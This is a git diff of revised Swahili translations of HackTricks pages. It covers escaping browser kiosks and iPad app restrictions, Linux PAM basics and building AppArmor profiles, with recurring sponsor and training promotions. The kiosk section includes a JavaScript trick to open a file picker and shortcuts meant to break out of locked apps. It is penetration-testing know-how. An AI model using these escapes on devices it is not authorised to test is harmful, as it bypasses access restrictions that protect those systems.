@ -168,43 +168,43 @@ Angalia ukurasa huu kwa maelezo zaidi: [https://www.howtohaven.com/system/show-f
# Mbinu za Vivinjari
Backup toleo za iKat:
Backup toleo la iKat:
[http://swin.es/k/](http://swin.es/k/)\
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
Unda mazungumzo ya kawaida kwa kutumia JavaScript na ufikie mtazamaji wa faili: `document.write('<input/type=file>')`
Unda dialog ya kawaida kwa kutumia JavaScript na ufikie mtazamaji wa faili: `document.write('<input/type=file>')`
Chanzo: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
# iPad
## Miguso na Vitufe
* Piga juu na vidole vinne (au vitano) / Bonyeza mara mbili kitufe cha Nyumbani: Kuona muonekano wa kazi nyingi na kubadilisha Programu
* Piga juu kwa vidole vinne (au vitano) / Bonyeza kitufe cha Nyumbani mara mbili: Kuona mtazamo wa kazi nyingi na kubadilisha Programu
* Piga upande mmoja au mwingine na vidole vinne au vitano: Ili kubadilisha kwa Programu inayofuata/ya mwisho
* Piga upande mmoja au mwingine kwa vidole vinne au vitano: Ili kubadilisha kwa Programu inayofuata/ya mwisho
* Kanda skrini na vidole vitano / Gusa kitufe cha Nyumbani / Piga juu na kidole 1 kutoka chini ya skrini kwa mwendo wa haraka kwenda juu: Kufikia Nyumbani
* Kanda skrini kwa vidole vitano / Gusa kitufe cha Nyumbani / Piga juu kutoka chini ya skrini kwa harakati ya haraka kwenda juu: Kupata Nyumbani
* Piga kidole 1 kutoka chini ya skrini kwa umbali wa 1-2 inchi (pole): Doki itaonekana
* Piga kidole kimoja kutoka chini ya skrini kwa umbali wa 1-2 inchi (polepole): Doki itaonekana
* Piga chini kutoka juu ya skrini na kidole 1: Kuona arifa zako
* Piga chini kutoka juu ya skrini kwa kidole kimoja: Kuona arifa zako
* Piga chini na kidole 1 kona ya juu-kulia ya skrini: Kuona kituo cha udhibiti wa iPad Pro
* Piga chini kwa kidole kimoja kona ya juu-kulia ya skrini: Kuona kituo cha udhibiti wa iPad Pro
* Piga kidole 1 kutoka kushoto mwa skrini 1-2 inchi: Kuona muonekano wa Leo
* Piga kidole kimoja kutoka kushoto mwa skrini 1-2 inchi: Kuona mtazamo wa Leo
* Piga haraka kidole 1 kutoka katikati mwa skrini kwenda kulia au kushoto: Kubadilisha kwa Programu inayofuata/ya mwisho
* Piga haraka kidole kimoja kutoka katikati mwa skrini kwenda kulia au kushoto: Kubadilisha kwa Programu inayofuata/ya mwisho
* Bonyeza na shikilia kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad +** Slide kuelekea kulia kabisa kwa kuzima: Kuzima
* Bonyeza na shikilia kitufe cha Kuwasha/Gafla/Gafla juu kulia mwa **iPad +** Hamisha Kielekezo cha **kuzima** kulia kabisa: Kuzima
* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani kwa sekunde chache**: Kufanya kuzima ngumu
* Bonyeza kitufe cha Kuwasha/Gafla/Gafla juu kulia mwa **iPad na kitufe cha Nyumbani kwa sekunde chache**: Kufanya kuzima ngumu
* Bonyeza kitufe cha Kuwasha/Kuzima/Sleep kwenye kona ya juu-kulia ya **iPad na kitufe cha Nyumbani haraka**: Kuchukua picha ya skrini itakayotokea chini kushoto ya skrini. Bonyeza vitufe vyote kwa wakati mmoja kwa muda mfupi kama vile unavyowashikilia kwa sekunde kadhaa kufanya kuzima ngumu.
* Bonyeza kitufe cha Kuwasha/Gafla/Gafla juu kulia mwa **iPad na kitufe cha Nyumbani haraka**: Kupiga picha ya skrini itakayotokea chini kushoto ya skrini. Bonyeza vifungo vyote kwa wakati mmoja kwa muda mfupi kana kwamba unawashikilia sekunde chache kuzima ngumu itafanyika.
## Vielekezi
## Vielekezo vya Haraka
Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezi pekee vinavyoweza kusaidia kutoroka kutoka kwa programu vitaonyeshwa hapa.
Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezo pekee vitakavyosaidia kutoroka kutoka kwa programu yataonyeshwa hapa.
| Kitufe | Jina |
| --- | ------------ |
@ -219,45 +219,45 @@ Unapaswa kuwa na kibodi ya iPad au kigeuzi cha kibodi cha USB. Vielekezi pekee v
| ↑ | Mshale wa Juu |
| ↓ | Mshale wa Chini |
### Vielekezi vya Mfumo
### Vielekezo vya Mfumo
Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iPad.
Vielekezo hivi ni kwa mipangilio ya kuonekana na sauti, kulingana na matumizi ya iPad.
| Vielekezi | Hatua |
| Vielekezo | Hatua |
| -------- | ------------------------------------------------------------------------------ |
| F1 | Punguza Skrini |
| F2 | Ongeza mwangaza wa skrini |
| F7 | Rudi nyimbo moja |
| F8 | Cheza/Acha |
| F8 | Cheza/Acha |
| F9 | Ruka nyimbo |
| F10 | Kimya |
| F10 | Lemaza |
| F11 | Punguza sauti |
| F12 | Ongeza sauti |
| ⌘ Space | Onyesha orodha ya lugha zilizopo; kuchagua moja, bonyeza tena kitufe cha nafasi. |
### Uvigezo wa iPad
| Vielekezi | Hatua |
| Vielekezo | Hatua |
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | Nenda kwa Nyumbani |
| ⌘⇧H (Amri-Shift-H) | Nenda kwa Nyumbani |
| ⌘ (Space) | Fungua Spotlight |
| ⌘⇥ (Amri-Tab) | Onyesha programu kumi zilizotumiwa mwisho |
| ⌘⇥ (Amri-Tab) | Orodhesha programu kumi zilizotumiwa mwisho |
| ⌘\~ | Nenda kwa Programu iliyopita |
| ⌘⇧3 (Amri-Shift-3) | Piga picha ya skrini (itajitokeza chini kushoto kuhifadhi au kuchukua hatua) |
| ⌘⇧3 (Amri-Shift-3) | Piga picha ya skrini (inahamia chini kushoto kuhifadhi au kuchukua hatua) |
| ⌘⇧4 | Piga picha ya skrini na ifungue kwenye mhariri |
| Bonyeza na shikilia ⌘ | Orodha ya vielekezi inapatikana kwa Programu |
| Bonyeza na shikilia ⌘ | Orodha ya vielekezo inapatikana kwa Programu |
| ⌘⌥D (Amri-Chaguo/Alt-D) | Lete doki |
| ^⌥H (Udhibiti-Chaguo-H) | Kitufe cha Nyumbani |
| ^⌥H H (Udhibiti-Chaguo-H-H) | Onyesha upau wa kazi nyingi |
| ^⌥I (Udhibiti-Chaguo-i) | Chagua kipengee |
| Kutoroka | Kitufe cha nyuma |
| → (Mshale wa Kulia) | Kipengee kijacho |
| → (Mshale wa Kulia) | Kipengee kifuatacho |
| ← (Mshale wa Kushoto) | Kipengee kilichopita |
| ↑↓ (Mshale wa Juu, Mshale wa Chini) | Bonyeza kwa wakati mmoja kipengee kilichochaguliwa |
| ⌥ ↓ (Chaguo-Mshale wa Chini) | Endesha chini |
| ⌥↑ (Chaguo-Mshale wa Juu) | Endesha juu |
| ⌥← au ⌥→ (Chaguo-Mshale wa Kushoto au Chaguo-Mshale wa Kulia) | Endesha kushoto au kulia |
| ⌥← or ⌥→ (Chaguo-Mshale wa Kushoto au Chaguo-Mshale wa Kulia) | Endesha kushoto au kulia |
| ^⌥S (Udhibiti-Chaguo-S) | Wezesha au Lemaza Sauti ya VoiceOver |
| ⌘⇧⇥ (Amri-Shift-Tab) | Badilisha kwa programu iliyopita |
| ⌘⇥ (Amri-Tab) | Badilisha kurudi kwa programu ya awali |
@ -273,9 +273,9 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP
| ⌘. | Acha kupakia kichupo cha sasa |
| ^⇥ | Badilisha kwenye kichupo kijacho |
| ^⇧⇥ (Kudhibiti-Shift-Tab) | Hamia kwenye kichupo kilichopita |
| ⌘L | Chagua kisanduku cha maandishi/URL kurekebisha |
| ⌘L | Chagua kisanduku cha maandishi/eneo la URL ili ulibadilishe |
| ⌘⇧T (Amri-Shift-T) | Fungua kichupo kilichofungwa mwisho (inaweza kutumika mara kadhaa) |
| ⌘\[ | Nenda nyuma ukurasa mmoja katika historia yako ya kutembelea |
| ⌘\[ | Rudi nyuma ukurasa mmoja katika historia yako ya kutembelea |
| ⌘] | Nenda mbele ukurasa mmoja katika historia yako ya kutembelea |
| ⌘⇧R | Wezesha Mode ya Msomaji |
@ -298,15 +298,15 @@ Vielekezi hivi ni kwa mipangilio ya visual na sauti, kulingana na matumizi ya iP
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochangiwa na **dark-web** inayotoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
@ -318,7 +318,7 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -1,26 +1,26 @@
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwenye:
{% embed url="https://whiteintel.io" %}
@ -28,7 +28,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Taarifa Msingi
**PAM (Moduli za Uthibitishaji Zinazoweza Kusanikishwa)** inafanya kama kifaa cha usalama ambacho **huthibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta**, kudhibiti upatikanaji wao kulingana na vigezo mbalimbali. Ni kama mlinzi wa kidijitali, kuhakikisha kuwa watumiaji walioruhusiwa pekee wanaweza kushirikiana na huduma maalum huku wakizuia matumizi yao kuzuia mzigo kwenye mfumo.
**PAM (Moduli za Uthibitishaji Zinazoweza Kusanikishwa)** inafanya kama kifaa cha usalama ambacho **huthibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta**, kudhibiti upatikanaji wao kulingana na vigezo mbalimbali. Inafanana na mlinzi wa kidijitali, ikihakikisha kuwa watumiaji walioruhusiwa pekee wanaweza kushirikiana na huduma maalum wakati wakizuia matumizi yao kuzuia mzigo kwenye mfumo.
### Faili za Usanidi
@ -50,37 +50,37 @@ session required /lib/security/pam_unix_session.so
```
### **Maeneo ya Usimamizi wa PAM**
Maeneo haya, au vikundi vya usimamizi, vinajumuisha **uthibitisho**, **akaunti**, **nenosiri**, na **kikao**, kila moja ikihusika na sehemu tofauti za mchakato wa uthibitisho na usimamizi wa kikao:
Maeneo haya, au vikundi vya usimamizi, ni pamoja na **auth**, **account**, **password**, na **session**, kila moja ikihusika na vipengele tofauti vya uthibitishaji na usimamizi wa kipindi cha kikao:
- **Uthibitisho**: Huthibitisha kitambulisho cha mtumiaji, mara nyingi kwa kumwomba nenosiri.
- **Akaunti**: Inashughulikia uthibitisho wa akaunti, ikichunguza hali kama uanachama wa kikundi au vizuizi vya wakati wa siku.
- **Nenosiri**: Inasimamia sasisho za nenosiri, ikiwa ni pamoja na ukaguzi wa ugumu au kuzuia mashambulizi ya kamusi.
- **Kikao**: Inasimamia hatua wakati wa kuanza au kumaliza kikao cha huduma, kama vile kupakia saraka au kuweka mipaka ya rasilimali.
- **Auth**: Inathibitisha kitambulisho cha mtumiaji, mara nyingi kwa kumwomba nywila.
- **Account**: Inashughulikia uthibitisho wa akaunti, ikichunguza hali kama uanachama wa kikundi au vizuizi vya wakati wa siku.
- **Password**: Inasimamia uppdatering wa nywila, ikiwa ni pamoja na ukaguzi wa ugumu au kuzuia mashambulizi ya kamusi.
- **Session**: Inasimamia hatua wakati wa kuanza au kumaliza kikao cha huduma, kama vile kupakia saraka au kuweka mipaka ya rasilimali.
### **Mipangilio ya Moduli ya PAM**
Mipangilio inadhibiti jibu la moduli kwa mafanikio au kushindwa, ikichochea mchakato mzima wa uthibitisho. Hizi ni pamoja na:
Mipangilio inaamua jibu la moduli kwa mafanikio au kushindwa, ikichochea mchakato mzima wa uthibitishaji. Hizi ni pamoja na:
- **Inahitajika**: Kushindwa kwa moduli inayohitajika kunasababisha kushindwa hatimaye, lakini baada ya kuchunguzwa moduli zote zifuatazo.
- **Lazima**: Kukoma mara moja kwa mchakato baada ya kushindwa.
- **Inatosha**: Mafanikio yanapuuza sehemu iliyobaki ya uchunguzi wa eneo hilo isipokuwa moduli inayofuata inashindwa.
- **Hiari**: Inasababisha kushindwa tu ikiwa ni moduli pekee katika mstari.
- **Required**: Kushindikana kwa moduli inayohitajika kunasababisha kushindwa hatimaye, lakini baada ya kuhakikiwa kwa moduli zote zifuatazo.
- **Requisite**: Kukomesha mara moja mchakato baada ya kushindwa.
- **Sufficient**: Mafanikio hupuuza ukaguzi mwingine wa eneo hilo isipokuwa moduli inayofuata inashindwa.
- **Optional**: Husababisha kushindwa tu ikiwa ni moduli pekee kwenye safu.
### **Mfano wa Tukio**
### Mfano wa Tukio
Katika mazingira yenye moduli nyingi za uthibitisho, mchakato unafuata mpangilio wa kina. Ikiwa moduli ya `pam_securetty` inagundua terminali ya kuingia isiyo ruhusa, kuingia kama mtumiaji wa mizizi kunazuiliwa, lakini moduli zote bado zinachakatwa kutokana na hadhi yake ya "inahitajika". Moduli ya `pam_env` inaweka mazingira ya mazingira, ikisaidia uzoefu wa mtumiaji. Moduli za `pam_ldap` na `pam_unix` zinafanya kazi pamoja kuthibitisha mtumiaji, na `pam_unix` ikijaribu kutumia nenosiri lililotolewa hapo awali, ikiboresha ufanisi na mabadiliko katika njia za uthibitisho.
Katika mazingira yenye moduli nyingi za auth, mchakato unafuata mpangilio wa kina. Ikiwa moduli ya `pam_securetty` inagundua terminali ya kuingia isiyo ruhusiwa, kuingia kama mtumiaji wa mizizi kunazuiliwa, lakini moduli zote bado zinashughulikiwa kutokana na hadhi yake ya "required". Moduli ya `pam_env` inaweka mazingira ya mazingira, ikisaidia uzoefu wa mtumiaji. Moduli za `pam_ldap` na `pam_unix` hufanya kazi pamoja kuthibitisha mtumiaji, na `pam_unix` ikijaribu kutumia nywila iliyotolewa awali, ikiboresha ufanisi na mabadiliko katika njia za uthibitishaji.
## Marejeo
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

View file

@ -2,25 +2,25 @@
<details>
<summary><strong>Jifunze kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -30,12 +30,12 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Taarifa Msingi
AppArmor ni **uboreshaji wa kernel ulioundwa kuzuia rasilimali zilizopo kwa programu kupitia maelezo ya kila programu**, ikitekeleza Udhibiti wa Kufikia wa Lazima (MAC) kwa kufunga sifa za kudhibiti upatikanaji moja kwa moja kwa programu badala ya watumiaji. Mfumo huu hufanya kazi kwa **kupakia maelezo ya kila programu kwenye kernel**, kawaida wakati wa kuanza, na maelezo haya yanadhibiti ni rasilimali gani programu inaweza kupata, kama vile uhusiano wa mtandao, ufikiaji wa soketi za moja kwa moja, na ruhusa za faili.
AppArmor ni **uboreshaji wa kernel ulioundwa kuzuia rasilimali zilizopo kwa programu kupitia maelezo ya programu, kutekeleza Udhibiti wa Kufikia wa Lazima (MAC) kwa kuunganisha sifa za kudhibiti upatikanaji moja kwa moja kwa programu badala ya watumiaji.** Mfumo huu hufanya kazi kwa **kupakia maelezo ya programu kwenye kernel**, kawaida wakati wa kuanza, na maelezo haya yanadhibiti ni rasilimali gani programu inaweza kupata, kama vile uhusiano wa mtandao, ufikiaji wa soketi za moja kwa moja, na ruhusa za faili.
Kuna njia mbili za uendeshaji kwa maelezo ya AppArmor:
- **Hali ya Utekelezaji**: Hali hii inatekeleza sera zilizoelezwa ndani ya maelezo, ikizuia vitendo vinavyokiuka sera hizi na kuingiza jaribio lolote la kukiuka kupitia mifumo kama syslog au auditd.
- **Hali ya Malalamiko**: Tofauti na hali ya utekelezaji, hali ya malalamiko haikazi vitendo vinavyokwenda kinyume na sera za maelezo. Badala yake, inaingiza jaribio hizi kama uvunjaji wa sera bila kutekeleza vizuizi.
- **Hali ya Utekelezaji**: Hali hii inatekeleza sera zilizoelezwa ndani ya maelezo, kuzuia vitendo vinavyokiuka sera hizi na kuingiza jaribio lolote la kukiuka kupitia mifumo kama syslog au auditd.
- **Hali ya Malalamiko**: Tofauti na hali ya utekelezaji, hali ya malalamiko haikatazi vitendo vinavyokwenda kinyume na sera za maelezo. Badala yake, inaingiza jaribio hizi kama uvunjaji wa sera bila kutekeleza vizuizi.
### Vipengele vya AppArmor
@ -44,12 +44,12 @@ Kuna njia mbili za uendeshaji kwa maelezo ya AppArmor:
- **Mchambuzi**: Hupakia sera kwenye kernel kwa utekelezaji au kuripoti.
- **Zana**: Hizi ni programu za mode ya mtumiaji zinazotoa kiolesura cha kuingiliana na kusimamia AppArmor.
### Njia ya Maelezo
### Njia za Maelezo
Maelezo ya Apparmor kawaida hufutwa katika _**/etc/apparmor.d/**_\
Kwa `sudo aa-status` utaweza kuorodhesha programu zilizozuiwa na maelezo fulani. Ikiwa unaweza kubadilisha herufi "/" kwa kipindi cha njia ya kila programu iliyoorodheshwa utapata jina la maelezo ya apparmor ndani ya folda iliyotajwa.
Kwa `sudo aa-status` utaweza kuorodhesha programu ambazo zinazuiliwa na maelezo fulani. Ikiwa unaweza kubadilisha herufi "/" kwa mshale wa njia ya kila programu iliyoorodheshwa na utapata jina la maelezo ya apparmor ndani ya folda iliyotajwa.
Kwa mfano, maelezo ya **apparmor** kwa _/usr/bin/man_ itapatikana katika _/etc/apparmor.d/usr.bin.man_
Kwa mfano, maelezo ya **apparmor** kwa _/usr/bin/man_ yatakuwa yamehifadhiwa katika _/etc/apparmor.d/usr.bin.man_
### Amri
```bash
@ -63,32 +63,32 @@ aa-mergeprof #used to merge the policies
```
## Kuunda wasifu
* Ili kuelezea programu inayohusika, **njia kamili na manyoya** huruhusiwa (kwa ajili ya kutambua faili) kwa kufafanua faili.
* Ili kuelezea ufikiaji ambao programu itakuwa nayo juu ya **faili** inaweza kutumika **udhibiti wa ufikiaji** zifuatazo:
* **r** (kusoma)
* **w** (kuandika)
* **m** (ramani ya kumbukumbu kama inayoweza kutekelezwa)
* **k** (kufunga faili)
* **l** (kuunda viungo vya ngumu)
* **ix** (kutekeleza programu nyingine na programu mpya kurithi sera)
* **Px** (kutekeleza chini ya wasifu mwingine, baada ya kusafisha mazingira)
* **Cx** (kutekeleza chini ya wasifu wa mtoto, baada ya kusafisha mazingira)
* **Ux** (kutekeleza bila kizuizi, baada ya kusafisha mazingira)
* Ili kuelezea kielelezo kilichoathiriwa, **njia kamili na manyoya** huruhusiwa (kwa ajili ya kufanya mchanganyiko wa faili) kwa kufafanua faili.
* Ili kuelezea ufikiaji ambao programu ya binary itakuwa nayo juu ya **faili** inaweza kutumika **udhibiti wa ufikiaji** zifuatazo:
* **r** (soma)
* **w** (andika)
* **m** (ramani ya kumbukumbu kama inayoweza kutekelezwa)
* **k** (kufunga faili)
* **l** (kuunda viungo vya ngumu)
* **ix** (kutekeleza programu nyingine na programu mpya kurithi sera)
* **Px** (kutekeleza chini ya wasifu mwingine, baada ya kusafisha mazingira)
* **Cx** (kutekeleza chini ya wasifu wa mtoto, baada ya kusafisha mazingira)
* **Ux** (kutekeleza bila kizuizi, baada ya kusafisha mazingira)
* **Viarasa** vinaweza kutajwa katika maelezo na vinaweza kubadilishwa kutoka nje ya wasifu. Kwa mfano: @{PROC} na @{HOME} (ongeza #include \<tunables/global> kwenye faili ya wasifu)
* **Mipangilio ya kukataa inasaidia kubadilisha viwango vya kuruhusu**.
* **Mipangilio ya kukataa inasaidia kubadilisha viarasa vya kuruhusu**.
### aa-genprof
Ili kuanza kwa urahisi kuunda wasifu, apparmor inaweza kukusaidia. Ni rahisi kufanya **apparmor ichunguze vitendo vinavyofanywa na programu na kisha kuruhusu au kukataa vitendo**.\
Unahitaji tu kukimbia:
Ili kuanza kwa urahisi kuunda wasifu, apparmor inaweza kukusaidia. Ni rahisi kufanya **apparmor ichunguze vitendo vilivyofanywa na binary na kisha kuruhusu au kukataa vitendo unavyotaka**.\
Unachohitaji kufanya ni kukimbia:
```bash
sudo aa-genprof /path/to/binary
```
Kisha, kwenye konsoli tofauti tekeleza hatua zote ambazo kawaida programu ya binary itatekeleza:
Kisha, kwenye konsoli tofauti fanya vitendo vyote ambavyo kawaida binary itafanya:
```bash
/path/to/binary -a dosomething
```
Kisha, katika console ya kwanza bonyeza "**s**" na kisha katika hatua zilizorekodiwa eleza ikiwa unataka kusahau, kuruhusu, au chochote. Ukimaliza bonyeza "**f**" na wasifu mpya utaundwa katika _/etc/apparmor.d/path.to.binary_
Kisha, kwenye konsoli ya kwanza bonyeza "**s**" na kisha kwenye hatua zilizorekodiwa eleza ikiwa unataka kupuuza, kuruhusu, au chochote. Ukimaliza bonyeza "**f**" na wasifu mpya utaundwa katika _/etc/apparmor.d/path.to.binary_
{% hint style="info" %}
Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/chochote
@ -96,7 +96,7 @@ Kwa kutumia mishale unaweza kuchagua unachotaka kuruhusu/kukataa/chochote
### aa-easyprof
Unaweza pia kuunda kiolezo cha wasifu wa apparmor wa binary na:
Unaweza pia kuunda kiolezo cha wasifu wa apparmor wa binary kwa:
```bash
sudo aa-easyprof /path/to/binary
# vim:syntax=apparmor
@ -125,7 +125,7 @@ sudo aa-easyprof /path/to/binary
Tafadhali elewa kwamba kwa chaguo-msingi katika wasifu ulioundwa hakuna kitu kilichoruhusiwa, kwa hivyo kila kitu kimekataliwa. Utahitaji kuongeza mistari kama `/etc/passwd r,` kuruhusu kusoma faili ya binary `/etc/passwd` kwa mfano.
{% endhint %}
